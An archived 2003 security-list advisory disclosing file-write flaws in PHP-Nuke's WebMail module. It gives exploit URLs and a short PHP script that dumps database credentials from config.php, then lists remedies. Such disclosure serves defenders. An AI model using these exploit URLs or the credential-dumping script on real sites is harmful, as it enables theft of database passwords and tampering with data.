('binary' encoding is not supported, stored as-is) Hello again friends, Proving in my sites www.novappc.com , i discovered that the PHP-nuke code injection for write the content of config.php in a file have more vulnerabilities than one ,i explain it: PROBLEM: Webmail module is an unsafely mail system , but not all the package, only the little file called mailattach.php , the first vulnerability discovered is this: http://NUKESITE/modules/WebMail/mailattach.php?% 20userfile=../../config.php&userfile_name=../attachments/file.txt&attachme nts=1 (It enables that the attacker writes all the content og config.php , passwords and users , in a file file.txt) THE NEW VULNERABILITY: I discovered it proving the other old , CODE: http://NUKESITE/modules/WebMail/mailattach.php?%20userfile=[DIR TO PHP FILE ]&userfile_name=../attachments/h4ckz.php&attachments=1 DESCRIPTION: [DIR TO PHP FILE]: This is the directory of your php file that prints the content of the variables in config.php , the code of the file is: <?php include ("../../config.php") echo 'DB User:',"$dbuname"; echo '<br><br>'; echo 'Host for Fuck:',"$dbhost"; echo '<br><br>'; echo 'Password:',"$dbpass"; echo '<br><br>'; echo 'Thats all folks my little fucker'; ?> This file load variables from config.php to the h4ckz.php file end prints all content of the variables using echo function of php. You only must access the temporal file in the server in the directory that you put in the &userfile_name of the xploit url. WHAT CAN BE HAPPEN? All the passwords of config.php are given , the attacker can be use it for modify, rename or DELETE the database depending of the privileges and the situation of the web admin tool , like phpnuke and the access configuration of database , acept tcp/ip connects or not accept. ONLY AFFECT WEBMAIL? No, all the modules that upload files can be unsafely because you can modify the variables of the xploit url to run with other module that upload files. SOLUTION (SECURING PHP-NUKE): FIRST: Modify code of all the files that upload files of course for die when the file is called remotely ( QUERY_STRING remote and REFERER remote) , you an find more info about this in the modules.php file. SECOND: Be sure (optional) that the php-nuke not use a root user for database. THIRT: Modify mysql/postgre/etc config for only accept connects of localhost and the web admin apps. like php admin ( on remote servers ) cant run with your server ;-) FOURTH: Activate only the modules that you use, Xd. CONTACT: EMAIL: adminat_private WEBSITE: novappc.com novappc.mine.nu NAME: LORENZO MANUEL HERNANDEZ GARCIA-HIERRO
This archive was generated by hypermail 2b30 : Sun Mar 02 2003 - 14:04:49 PST